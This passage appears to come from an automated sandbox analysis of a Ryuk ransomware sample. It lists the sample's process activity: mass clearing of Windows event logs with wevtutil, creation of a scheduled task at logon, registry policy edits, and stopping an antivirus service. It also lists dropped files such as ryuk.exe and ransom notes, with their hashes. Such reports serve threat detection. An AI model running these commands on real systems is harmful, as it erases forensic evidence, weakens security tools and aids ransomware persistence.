C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WMPDMCUI/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WMPNSS-PublicAPI/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WMPNSS-Service/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WMPNSSUI/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WPD-MTPClassDriver/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WSC-SRV/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WUSA/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WWAN-MM-Events/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WWAN-NDISUIO-EVENTS/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WWAN-SVC-Events/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WWAN-UI-Events/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WebIO-NDF/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WebIO/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WebServices/Tracing"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Win32k/Concurrency"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Win32k/Power"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Win32k/Render"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Win32k/Tracing"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Win32k/UIPI"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WinHTTP-NDF/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WinHttp/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WinINet/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WinRM/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WinRM/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WinRM/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windeploy/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windows Defender/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windows Defender/WHC"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurity"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurityVerbose"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/Firewall"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/FirewallVerbose"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WindowsBackup/ActionCenter"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Tracing"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WindowsUpdateClient/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Wininit/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Winlogon/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Winlogon/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Winsock-AFD/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Winsock-WS2HELP/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Winsrv/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Wordpad/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Wordpad/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Wordpad/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-mobsync/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ntshrui"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-osk/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-stobject/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "OAlerts"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Security"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Setup"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "System"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "TabletPC_InputPanel_Channel"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "WINDOWS_MP4SDECD_CHANNEL"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "WINDOWS_MSMPEG2VDEC_CHANNEL"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "WINDOWS_WMPHOTO_CHANNEL"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "WMPSetup"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "WMPSyncEngine"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Windows PowerShell"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "microsoft-windows-RemoteDesktopServices-RemoteDesktopSessionManager/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "muxencode"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\net.exenet stop avpsus /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y2⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RyukReadMe.txt (1KB)
  MD5: f69127370e1f1aede86e881dd446f6aa
  SHA1: 65298f80e3b97f59ea45179463ab9c5cc3ee9337
  SHA256: da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc
  SHA512: 5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4
- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe (885KB)
  MD5: 6a5bf25ff4f72ebca91280ffda057260
  SHA1: 722063331acdbfc93ccbfacbec045800a835dd9e
  SHA256: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
  SHA512: 64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42
- C:\ProgramData\RYUKID (8B)
  MD5: 9c2ac4bed585b59bfd5cd797bf7f9f96
  SHA1: f70dd2b190d6dc2537d9797041155cbffe94c37b
  SHA256: 1774604f31316032a86853c514f08ef952fc96fd1f163a2ba6a780bf63cd1f35
  SHA512: 55f63e4ab8a68e5dc6f59623ebc5d6a40fafd86459a02e7db18fd90f9a1c3c663c758b9dbac78ce4ecd7a9a16bf69aa09cf20474353956f710e6f99f6c46cbe1
- C:\ProgramData\RyukReadMe.html (152B)
  MD5: a641bf8ac8307aad57ecab53872e67db
  SHA1: 6fa8d69a859c34b8e75223ed8f426dbdf3d03df7
  SHA256: 9383b707c654726704f6968a151b67fa564653e91c8f3a31298b8cb81469d2ce
  SHA512: 7d32498611e54397ee320ab09380356c3470daf8e45e0a41d550df129027ca7279f14ec2b9f1b33d312ddca7b7f446f1c5689cae83502f4144f5807e39dcf5f4
- C:\ProgramData\RyukReadMe.html.[Vulcanteam@CYBERFEAR.COM].RYK (858B)
  MD5: 4b50035e27e1d6ce815243181bf2566d
  SHA1: e4d79b2b99ba166924e39c5231b2a814503c1440
  SHA256: 1f8eefea2f1df6c92e2a70bbdecace76686f62d3ac58f182f4eb66008a29bc0f
  SHA512: ff6450dc7fcd80f0882af38915ee714488356b6c664c4ee5f358732eb916b9832e1cbe08975c3a32c925ef314680f32822ade29ed5bc60f5c3f0500e6c69aa51
- C:\ProgramData\RyukReadMe.txt (1KB)
  MD5: f69127370e1f1aede86e881dd446f6aa
  SHA1: 65298f80e3b97f59ea45179463ab9c5cc3ee9337
  SHA256: da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc
  SHA512: 5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4
- C:\ProgramData\hrmlog1 (2KB)
  MD5: a967c36c1b87375882710936daa98ff3
  SHA1: c18bbe9376ffedb0aad0ce15df1a5fc6f0e25090
  SHA256: eeabe3d251ebb631a34df39448a37cfae97455dd9aaaf77e7924544636703c50
  SHA512: d332a8383c3c8aa13517acf6d135f075d20ac4d026f7c27aff006cf3f53d12c427d85306860e0c693baa27e3613e8e5677c66b34ef67615c85be9cb05fd79528
- C:\ProgramData\hrmlog2 (292B)
  MD5: c8d691d74fbebbd6e92f6c805f48af65
  SHA1: 72bc5685a81374cd18394ae2fae1276b7a4189f6
  SHA256: 912b915784fe8aae63b556a66d949fe3b385398781b14f6c5fd3ced306b73e29
  SHA512: 9a58d9f5341745590dbbda7d41d63945f724ff2ed82d1290d1837bfc667e9598f010475f92865a66b3cf66ba5622bd342329974491b20d719ccd47d2d4462b16
- C:\ProgramData\ryuk.exe (885KB)
  MD5: 6a5bf25ff4f72ebca91280ffda057260
  SHA1: 722063331acdbfc93ccbfacbec045800a835dd9e
  SHA256: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
  SHA512: 64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42
- C:\Users\Admin\AppData\Local\Temp\RYUKID (8B)
  MD5: 9c2ac4bed585b59bfd5cd797bf7f9f96
  SHA1: f70dd2b190d6dc2537d9797041155cbffe94c37b
  SHA256: 1774604f31316032a86853c514f08ef952fc96fd1f163a2ba6a780bf63cd1f35
  SHA512: 55f63e4ab8a68e5dc6f59623ebc5d6a40fafd86459a02e7db18fd90f9a1c3c663c758b9dbac78ce4ecd7a9a16bf69aa09cf20474353956f710e6f99f6c46cbe1
- C:\Users\Admin\AppData\Local\Temp\hrmlog1 (2KB)
  MD5: a967c36c1b87375882710936daa98ff3
  SHA1: c18bbe9376ffedb0aad0ce15df1a5fc6f0e25090
  SHA256: eeabe3d251ebb631a34df39448a37cfae97455dd9aaaf77e7924544636703c50
  SHA512: d332a8383c3c8aa13517acf6d135f075d20ac4d026f7c27aff006cf3f53d12c427d85306860e0c693baa27e3613e8e5677c66b34ef67615c85be9cb05fd79528
- C:\Users\Admin\AppData\Local\Temp\hrmlog2 (292B)
  MD5: c8d691d74fbebbd6e92f6c805f48af65
  SHA1: 72bc5685a81374cd18394ae2fae1276b7a4189f6
  SHA256: 912b915784fe8aae63b556a66d949fe3b385398781b14f6c5fd3ced306b73e29
  SHA512: 9a58d9f5341745590dbbda7d41d63945f724ff2ed82d1290d1837bfc667e9598f010475f92865a66b3cf66ba5622bd342329974491b20d719ccd47d2d4462b16
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe (885KB)
  MD5: 6a5bf25ff4f72ebca91280ffda057260
  SHA1: 722063331acdbfc93ccbfacbec045800a835dd9e
  SHA256: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
  SHA512: 64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42